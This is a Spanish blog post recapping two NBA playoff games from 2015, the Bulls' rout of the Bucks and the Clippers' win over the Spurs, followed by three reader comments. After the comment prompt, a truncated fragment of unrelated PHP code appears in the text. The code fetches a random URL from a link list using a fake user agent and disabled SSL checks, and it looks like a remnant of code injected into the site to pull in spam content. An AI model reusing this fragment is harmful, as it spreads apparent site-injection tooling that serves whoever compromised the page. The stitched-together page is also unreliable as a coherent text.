La Crónica: Las lágrimas de Steve Ballmer

01 de May de 2015 por TheDeerHunter

La máxima es “no subestimes el corazón de un campeón”, aunque en el Oeste hoy es el campeón quien no debe subestimar el corazón de los aspirantes a arrebatarle la corona. De alguna manera todos habíamos dado por acabados a los Clippers tras el fatídico palmeo de DeAndre Jordan en el quinto partido pero anoche dieron muestras de una extraordinaria solidez mental para superar a los Spurs en el “Álamo”. Su propietario lloraba emocionado en la grada ante una gesta que es “rara avis” en la historia de la franquicia pobre de Los Angeles. Por su parte los Bulls huelen sangre en su hipotético camino a la final de conferencia y aplastaron definitivamente a los Bucks.

Bulls 120 – Bucks 66

El palizón de primera ronda dice mucho de la actitud con la que los Bulls han afrontado alguno de sus recientes partidos. Con la lesión de Kevin Love se les amplían las posibilidades de acceder a la final de conferencia o incluso a pelear por el anillo. Quizá por este motivo ayer vimos una exhibición defensiva del equipo de Thibodeau que dejó a su rival en 33 puntos por mitad delante de su parroquia. La frustración provocó la expulsión de Giannis Antetokounmpo antes del descanso, firmando un lamentable epílogo a una brillante campaña. Los Bulls siguieron a lo suyo, con un quinteto titular demoledor y la mejor actuación de sus reservas en toda la serie. Nikola Mirotic ha terminado segundo en las votaciones por el RoY, aunque no pudo celebrarlo con una gran actuación.

MVP: Mike Dunleavy 20 puntos, 4 rebotes, 5 asistencias

Clippers 102 – Spurs 96

Contra todo pronóstico la mejor serie de primera ronda vuelve a Los Angeles en la que quizá ha sidi la victoria más meritoria en la historia de los Clippers. Excepcional nuevamente el choque de trenes que nos ofrecieron ambos contendientes. Los angelinos salieron mentalizados desde el principio a estropear la fiesta a los locales, con una gran actuación de JJ Redick y Matt Barnes como novedad a la gran serie que nos está ofreciendo el tridente Chris Paul-Blake Griffin-DeAndre Jordan. Los titulares Clippers doblegaron a sus homónimos rivales, pero desde el banco Marco Bellinelli y Boris Diaw equilibraron el partido ante una segunda unidad rival prácticamente inoperante. Fue un toma y daca de principio a fin que puso a prueba la templanza de todos, pero se apreció que los Clippers estaban un puntito por encima que, en esta ocasión, supieron hacer valer. Resulta irónico que en este partido tan crítico fueran los Spurs quienes padecieron la maldición de los tiros libres con apenas un 57%. Debe de ser el karma.

MVP: Blake Griffin 26 puntos, 12 rebotes, 6 asistencias, 4 tapones.

Comenta

3 comentarios a esta entrada

  1. Ruxixón dice:
    #1

    La verdad que a mí me parece que por ligeros detalles han sido mejores los Clippers en 5 de los 6 partidos de la serie,y habla de la grandeza de los Spurs que la cosa vaya 3-3 y que por ser quienes son partan como favoritos en el último partido pero será moneda al aire y que gane el mejor.La verdad que han honrado a lo que se esperaba de la serie.

    Enormes los PO de Blake Griffin y más si se comparan con los números del año pasado.En anotación casi 1 punto más,pero suma más de 6 rebotes y 3 asistencias por partido respecto a la temporada anterior.

    Decepción total el ultimo partido de la serie de los ciervos y los toretes.Como casi todo el mundo me esperaba un partido igualado en un margen de 6-10 puntos,pero excelente defensa de los Bulls y truquillos de perro viejo,como ese Dunleavy que aunque recibió la del griego,soltó un par por ahí de pillo total.Por cierto,¿cuántos años tiene Dunleavy?¿754?Una pena que Chicago no llegue con más desgaste a la serie de Cleveland,a ver lo que se puede hacer.

      Citar

  2. Romino dice:
    #2

    Qué eliminatoria!!!! Viva duncan, viva griffin. Una leyenda y una promesa que no llegarà a Davids pero primera espada de un aspirante. La nba se renueva y de qué manera

      Citar

  3. rumbero dice:
    #3

    Pero que partidazo este séptimo por dios…el mejor de todos y ya era difícil

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>